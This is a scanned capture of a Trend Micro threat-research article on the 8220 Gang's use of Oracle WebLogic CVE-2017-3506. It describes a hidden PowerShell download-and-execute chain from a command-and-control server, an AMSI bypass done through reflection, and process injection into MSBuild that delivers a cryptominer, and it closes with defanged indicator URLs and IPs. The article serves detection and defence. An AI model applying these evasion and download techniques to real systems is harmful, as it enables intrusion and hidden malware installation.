www.trendmicro.com
Open in
urlscan Pro
104.102.42.47
Public Scan
URL:
https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html
Submission: On May 17 via api from TR — Scanned from DE
Submission: On May 17 via api from TR — Scanned from DE
Form analysis 1 forms found in the DOM
<form class="main-menu-search" aria-label="Search Trend Micro" data-equally-id="equally_ai___1XgYn">
<div class="main-menu-search__field-wrapper" id="cludo-search-form">
<table class="gsc-search-box">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" class="gsc-input-field" name="search" title="search" placeholder="Search" aria-label="search">
</td>
</tr>
</tbody>
</table>
</div>
</form>Text Content
Business
search close
* Solutions
* Platform
* Trend One
Our Unified Platform
Bridge threat protection and cyber risk management
Learn more
* By Challenge
* By Challenge
* By Challenge
Learn more
* Understand, Prioritize & Mitigate Risks
* Understand, Prioritize & Mitigate Risks
Improve your risk posture with attack surface management
Learn more
* Protect Cloud-Native Apps
* Protect Cloud-Native Apps
Security that enables business outcomes
Learn more
* Protect Your Hybrid World
* Protect Your Hybrid, Multi-Cloud World
Gain visibility and meet business needs with security
Learn more
* Securing Your Borderless Workforce
* Securing Your Borderless Workforce
Connect with confidence from anywhere, on any device
Learn more
* Eliminate Network Blind Spots
* Eliminate Network Blind Spots
Secure users and key operations throughout your environment
Learn more
* See More. Respond Faster.
* See More. Respond Faster.
Move faster than your adversaries with powerful purpose-built XDR,
attack surface risk management, and zero trust capabilities
Learn more
* Extend Your Team
* Extend Your Team. Respond to Threats Agilely
Maximize effectiveness with proactive risk reduction and managed
services
Learn more
* By Role
* By Role
* By Role
Learn more
* CISO
* CISO
Drive business value with measurable cybersecurity outcomes
Learn more
* SOC Manager
* SOC Manager
See more, act faster
Learn more
* Infrastructure Manager
* Infrastructure Manager
Evolve your security to mitigate threats quickly and effectively
Learn more
* Cloud Builder and Developer
* Cloud Builder and Developer
Ensure code runs only as intended
Learn more
* Cloud Security Ops
* Cloud Security Ops
Gain visibility and control with security designed for cloud
environments
Learn more
* By Industry
* By Industry
* By Industry
Learn more
* Healthcare
* Healthcare
Protect patient data, devices, and networks while meeting regulations
Learn more
* Manufacturing
* Manufacturing
Protecting your factory environments – from traditional devices to
state-of-the-art infrastructures
Learn more
* Oil & Gas
* Oil & Gas
ICS/OT Security for the oil and gas utility industry
Learn more
* Electric Utility
* Electric Utility
ICS/OT Security for the electric utility
Learn more
* Federal
* Federal
Learn more
* Automotive
* Automotive
Learn more
* 5G Networks
* 5G Networks
Learn more
* Products
* Cloud Security
* Cloud Security
* Trend Cloud One
Cloud Security Overview
The most trusted cloud security platform for developers, security
teams, and businesses
Learn more
* Workload Security
* Workload Security
Secure your data center, cloud, and containers without compromising
performance by leveraging a cloud security platform with CNAPP
capabilities
Learn more
* Cloud Security Posture Management
* Cloud Security Posture Management
Leverage complete visibility and rapid remediation
Learn more
* Container Security
* Container Security
Simplify security for your cloud-native applications with advanced
container image scanning, policy-based admission control, and container
runtime protection
Learn more
* File Storage Security
* File Storage Security
Security for cloud file/object storage services leveraging cloud-native
application architectures
Learn more
* Endpoint Security
* Endpoint Security
Defend your endpoints at every stage
Learn more
* Network Security
* Network Security
Advanced cloud-native network security detection, protection, and cyber
threat disruption for your single and multi-cloud environments.
Learn more
* Open Source Security
* Open Source Security
Visibility and monitoring of open source vulnerabilities for SecOps
Learn more
* Cloud Visibility
* Cloud Visibility
As your organization continues to move data and apps to the cloud and
transform your IT infrastructure, mitigating risk without slowing down
the business is critical.
Learn more
* Network Security
* Network Security
* Network Security Overview
Expand the power of XDR with network detection and response
Learn more
* Network Intrusion Prevention (IPS)
* Network Intrusion Prevention (IPS)
Protect against known, unknown, and undisclosed vulnerabilities in your
network
Learn more
* Breach Detection System (BDS)
* Breach Detection System (BDS)
Detect and respond to targeted attacks moving inbound, outbound, and
laterally
Learn more
* Secure Service Edge (SSE)
* Secure Service Edge (SSE)
Redefine trust and secure digital transformation with continuous risk
assessments
Learn more
* OT & ICS Security
* OT & ICS Security
Learn more
* Endpoint & Email Security
* Endpoint & Email Security
* Endpoint & Email Security Overview
Protect your users on any device, any application, anywhere with Trend
Micro Workforce One
Learn more
* Endpoint Protection
* Endpoint Protection
Learn more
* Email Security
* Email Security
Stop phishing, malware, ransomware, fraud, and targeted attacks from
infiltrating your enterprise
Learn more
* Mobile Security
* Mobile Security
On-premises and cloud protection against malware, malicious
applications, and other mobile threats
Learn more
* Security Operations
* Security Operations
* Trend Vision One
Security Operations Overview
A cloud-native security operations platform built to empower security
teams
Learn more
* Attack Surface Management
* Attack Surface Management
Operationalize a zero trust strategy
Learn more
* XDR (Extended Detection & Response)
* XDR (Extended Detection & Response)
Stop adversaries faster with a broader perspective and better context
to hunt, detect, investigate, and respond to threats from a single
platform
Learn more
* Threat Intelligence
* Threat Intelligence
Keep ahead of the latest threats and protect your critical data with
ongoing threat prevention and analysis
Learn more
* Small & Midsized Business Security
* Small & Midsized Business Security
Stop threats with comprehensive, set-it-and-forget-it protection
Learn more
* All Products, Services and Trials
* All Products, Services and Trials
Learn more
* Research
* Research
* Research
* Research
Learn more
* About Our Research
* About Our Research
Learn more
* Research, News, and Perspectives
* Research, News, and Perspectives
Learn more
* Research and Analysis
* Research and Analysis
Learn more
* Blog
* Blog
Learn more
* Security News
* Security News
Learn more
* Zero Day Initiatives (ZDI)
* Zero Day Initiatives (ZDI)
Learn more
* Services
* Our Services
* Our Services
* Our Services
Learn more
* Service Packages
* Service Packages
Augment security teams with 24/7/365 managed detection, response, and
support
Learn more
* Managed XDR
* Managed XDR
Augment threat detection with expertly managed detection and response
(MDR) for email, endpoints, servers, cloud workloads, and networks
Learn more
* Support Services
* Support Services
Learn more
* Partners
* Channel Partners
* Channel Partners
* Channel Partner Overview
Grow your business and protect your customers with the best-in-class
complete, multilayered security
Learn more
* Managed Service Provider
* Managed Service Provider
Partner with a leading expert in cybersecurity, leverage proven
solutions designed for MSPs
Learn more
* Cloud Service Provider
* Cloud Service Provider
Add market-leading security to your cloud service offerings – no matter
which platform you use
Learn more
* Professional Services
* Professional Services
Increase revenue with industry-leading security
Learn more
* Resellers
* Resellers
Discover the possibilities
Learn more
* Marketplace
* Marketplace
Learn more
* System Integrators
* System Integrators
Learn more
* Alliance Partners
* Alliance Partners
* Alliance Overview
We work with the best to help you optimize performance and value
Learn more
* Technology Alliance Partners
* Technology Alliance Partners
Learn more
* Our Alliance Partners
* Our Alliance Partners
Learn more
* Partner Tools
* Partner Tools
* Partner Tools
Learn more
* Partner Login
* Partner Login
Login
* Education and Certification
* Education and Certification
Learn more
* Partner Successes
* Partner Successes
Learn more
* Distributors
* Distributors
Learn more
* Find a Partner
* Find a Partner
Learn more
* About
* Why Trend Micro
* Why Trend Micro
* Why Trend Micro
Learn more
* The Trend Micro Difference
* The Trend Micro Difference
Learn more
* Customer Success Stories
* Customer Success Stories
Learn more
* The Human Connection
* The Human Connection
Learn more
* Industry Accolades
* Industry Accolades
Learn more
* Strategic Alliances
* Strategic Alliances
Learn more
* Company
* Company
* Company
Learn more
* Trust Center
* Trust Center
Learn more
* History
* History
Learn more
* Diversity, Equity and Inclusion
* Diversity, Equity and Inclusion
Learn more
* Corporate Social Responsibility
* Corporate Social Responsibility
Learn more
* Leadership
* Leadership
Learn more
* Security Experts
* Security Experts
Learn more
* Internet Safety and Cybersecurity Education
* Internet Safety and Cybersecurity Education
Learn more
* Legal
* Legal
Learn more
* Resources
* Resources
* Resources
Learn more
* Newsroom
* Newsroom
Learn more
* Events
* Events
Learn more
* Investors
* Investors
Learn more
* Careers
* Careers
Learn more
* Webinars
* Webinars
Learn more
Back
Back
Back
Back
* Free Trials
* Contact Us
Looking for home solutions?
Under Attack?
0
Back
Folio (0)
Support
* Business Support Portal
* Virus and Threat Help
* Renewals and Registration
* Education and Certification
* Contact Support
* Find a Support Partner
Resources
* Cyber Risk Index/Assessment
* CISO Resource Center
* DevOps Resource Center
* What Is?
* Threat Encyclopedia
* Cloud Health Assessment
* Cyber Insurance
* Glossary of Terms
* Webinars
Log In
* Support
* Partner Portal
* Cloud One
* Product Activation and Management
* Referral Affililate
Back
arrow_back
search
close
Content has been added to your Folio
Go to Folio (0) close
Exploits & Vulnerabilities
8220 GANG EVOLVES WITH NEW STRATEGIES
We observed the threat actor group known as “8220 Gang” employing new strategies
for their respective campaigns, including exploits for the Linux utility
“lwp-download” and CVE-2017-3506, an Oracle WebLogic vulnerability.
By: Sunil Bharti May 16, 2023 Read time: 4 min (1209 words)
Save to Folio
Subscribe
--------------------------------------------------------------------------------
8220 Gang (also known as “8220 Mining Group,” derived from their use of port
8220 for command and control or C&C communications exchange) has been active
since 2017 and continues to scan for vulnerable applications in cloud and
container environments. Researchers have documented this group targeting Oracle
WebLogic, Apache Log4j, Atlassian Confluence vulnerabilities, and misconfigured
Docker containers to deploy cryptocurrency miners in both Linux and Microsoft
Windows hosts. The group was documented to have used Tsunami malware, XMRIG
cryptominer, masscan, and spirit, among other tools in their campaigns.
Looking at other researchers’ documentation on the gang’s recent activities, it
appears as if the threat actor has been active in recent months. This article
explores a recent attack observed exploiting the Oracle WebLogic vulnerability
CVE-2017-3506 captured by one of our honeypots. This vulnerability, with a CVSS
score of 7.4, impacts the WLS Security Component of Oracle WebLogic, and when
exploited can enable attackers to execute arbitrary commands through an HTTP
request remotely with a specifically crafted XML document. This allows attackers
to gain unauthorised access to sensitive data or compromise the entire system.
Entry point
Figure 1. Exploiting CVE-2017-3506
Attackers exploited the HTTP URI (Uniform Resource Identifier)
"wls-wsat/CoordinatorPortType" as an entry point to target an Oracle WebLogic
server leveraging the CVE-2017-3506 vulnerability.
Figure 2. Post request to vulnerable resource
On entry, 8220 Gang delivered a PowerShell script that downloads and creates
other dropper files using the said six-year old vulnerability. In recent
attacks, we also observed the group using “lwp-download,” a Linux utility for
downloading a file specified by the URL. In this entry, we observed the use of
this utility also targeting Windows systems.
Figure 3. Use of the lwp-download utility
Infection routine
The attack payload executes a PowerShell command encoded using Base64. Upon
decoding, it executes a command that opens a hidden PowerShell window (-NonI -W
Hidden) with no profile loaded (-NoP), and bypasses execution policies (-Exec
Bypass). The decoded command downloads and executes a PowerShell script from
http[:]//185[.]17[.]0[.]199/bypass.ps1 without displaying any visible output to
the user. The Base64-encoded string downloads a PowerShell script “bypass.ps1.”
Figure 4. Attack payload
Figure 5. URL after Base64 decoding
Analysis of bypass.ps1
Figure 6. Process flow of bypass.ps1
The PowerShell script decodes multiple Base64-encoded byte arrays to create
another obfuscated PowerShell script in memory and executes it using “iex”
(Invoke-Expression) commandlet.
Figure 7. Contents of the bypass.ps1 PowerShell script
All the variables assigned to byte arrays contain Base64-encoded strings (in
this case, the $c byte array). These byte arrays are used later in the script
for deobfuscation purposes. Once computation is done for the $cc variable, it
stores the decoded value of the $c byte array, which is the PowerShell script
that gets executed in memory without writing the script on the disk. Decoding
the $c variable using ASCII, the result is identified as the $cc variable and
executes the PowerShell script.
The new PowerShell script performs the following tasks:
1. It disables the AMSI detection. The code sets the value of
“amsiInitFailed” field from <System.Management.Automation.AmsiUtils> class to
“True” to achieve AMSI unhooking so that no scanning action will be done for the
current process. To update the value of “amsiInitFaild,” it uses .NET reflection
to assign a value of “True,” as observed in the bypass command.
Figure 8. AMSI detection bypass
2. After disabling AMSI detection, it defines the path to write the
malicious binary file into the Windows “temp” directory.
Figure 9. Malicious binary path
3. Next, it writes the binary file in the specified in the “$eXE_PaTh”
variable. This code section decodes the Base64 string into a byte array, which
is a binary code, and uses .Net class System.IO to write the binary file on the
disk.
Figure 10. Binary file write to disk
4. At the end of the script, the PowerShell executes the newly written
binary file in the Windows “temp” directory using the “-WindowStyle Hidden”
parameter in the command without displaying any user interface.
Figure 11. Binary execution
The file "Winscp-setup-1867.exe" is responsible for downloading the file
"Ebvjmba.dat" by continuously sending a GET request to its server
http[:]//79[.]137[.]203[.]156/Ebvjmba.dat. After executing
Winscp-setup-1867.exe, a DLL file contacts the file server to download the DAT
file dropper from 79[.]137[.]203[.]156, which is an IP address we determined to
be the C&C server. The DLL file uses the .NET framework's “HttpClient” class to
send an HTTP GET request to the specified asset URL.
Figure 12. Function that downloads the DAT file using .net code from the
dissembler
Figure 13. Network traffic capture of file download
This dropper only has a Base64-encoded string of a binary code in reverse to
evade detection.
Figure 14. Binary in reverse (top) and when decoded (bottom)
Figure 15. Function reversing the byte array to form the correct binary
The newly created .dll file is an encrypted resource file that is injected into
the MS Build process. The file is meticulously obfuscated, adding an extra layer
of complexity for analysts. After inspecting the process’ memory, we found that
the configuration information of the injected payload is Base64-encoded and the
new process communicates with one of the three C&Cs using TCP ports 9090, 9091,
or 9092 to download a cryptocurrency miner:
* 179[.]43[.]155[.]202
* work[.]letmaker[.]top
* su-94[.]letmaker[.]top
Figure 16. Process injection into msbuild.exe. Screenshot taken with Trend
Vision One™
Conclusion
lwp-download is a Linux utility present in a number of platforms by default, and
8220 Gang making this a part of any malware routine can affect a number of
services even if it were reused more than once. Considering the threat actor’s
tendency to reuse tools for different campaigns and abuse legitimate tools as
part of the arsenal, organizations’ security teams might be challenged to find
other detection and blocking solutions to fend off attacks that abuse this
utility.
Abuse of lwp-download might be expected in the short term for compromise and
targeting of other platforms. Despite reusing old tools and C&C servers, the
gang has started targeting Windows systems, and using new file and C&C servers
to evade previous detections. Moreover, while it would also initially seem
counterintuitive to use a six-year-old security gap in an attack, the malicious
actor’s scanning activity could have shown systems still vulnerable to the
exploit.
Considering these developments, we find 8220 Gang as a threat to be reckoned
with despite other researchers describing them as “low-level script kiddies,”
and that organizations still have to work on catching up when it comes to
updating their security systems. In the group’s previous deployments, earlier
scripts they used were simple, unable to evade detection, and were easy to
analyze. Over time, it included significantly damaging pieces of malware (such
as Tsunami malware) in respective campaigns. We will continue monitoring this
group and their respective deployments for analysis, detection, and blocking.
Trend Micro solutions
Trend Cloud One™ - Endpoint Security and Workload Security protect endpoints,
servers, and cloud workloads through unified visibility, management, and
role-based access control. These services provide specialized security optimized
for your diverse endpoint and cloud environments, which eliminate the cost and
complexity of multiple point solutions.
Indicators of Compromise (IOCs)
URLs and IPs
* http[:]//79[.]137[.]203[.]156/Ebvjmba.dat
* http[:]//185[.]17[.]0[.]19/bypass.ps1
* http[:]//185[.]17[.]0[.]19/Nmfwg.png
* 185[.]17[.]0[.]19
* 194[.]38[.]23[.]170
* 201[.]71[.]165[.]153
* 179[.]43[.]155[.]202
* Work[.]letmaker[.]top
* su-94[.]letmaker[.]top
MITRE ATT&CK
Tags
Malware | Cyber Crime | Exploits & Vulnerabilities | Cyber Threats | Endpoints |
Network | Articles, News, Reports
AUTHORS
* Sunil Bharti
Senior Threat Researcher
Contact Us
Subscribe
RELATED ARTICLES
* Water Orthrus's New Campaigns Deliver Rootkit and Phishing Modules
* Codex Exposed: Helping Hackers in Training?
* Codex Exposed: Task Automation and Response Consistency
See all articles
Try our services free for 30 days
* Start your free trial today
*
*
*
*
*
RESOURCES
* Blog
* Newsroom
* Threat Reports
* DevOps Resource Center
* CISO Resource Center
* Find a Partner
SUPPORT
* Business Support Portal
* Contact Us
* Downloads
* Free Trials
*
*
ABOUT TREND
* About Us
* Careers
* Locations
* Upcoming Events
* Trust Center
*
Select a country / region
United States expand_more
close
THE AMERICAS
* United States
* Brasil
* Canada
* México
MIDDLE EAST & AFRICA
* South Africa
* Middle East and North Africa
EUROPE
* België (Belgium)
* Česká Republika
* Danmark
* Deutschland, Österreich Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norway)
* Polska (Poland)
* Suomi (Finland)
* Sverige (Sweden)
* Türkiye (Turkey)
* United Kingdom
ASIA & PACIFIC
* Australia
* Центральная Азия (Central Asia)
* Hong Kong (English)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (India)
* Indonesia
* 日本 (Japan)
* 대한민국 (South Korea)
* Malaysia
* Монголия (Mongolia) and рузия (Georgia)
* New Zealand
* Philippines
* Singapore
* 台灣 (Taiwan)
* ประเทศไทย (Thailand)
* Việt Nam
Privacy | Legal | Accessibility | Site map
Copyright ©2023 Trend Micro Incorporated. All rights reserved
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
This website uses cookies for website functionality, traffic analytics,
personalization, social media functionality and advertising. Our Cookie Notice
provides more information and explains how to amend your cookie settings.Learn
more
Cookies Settings Accept
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
Sumo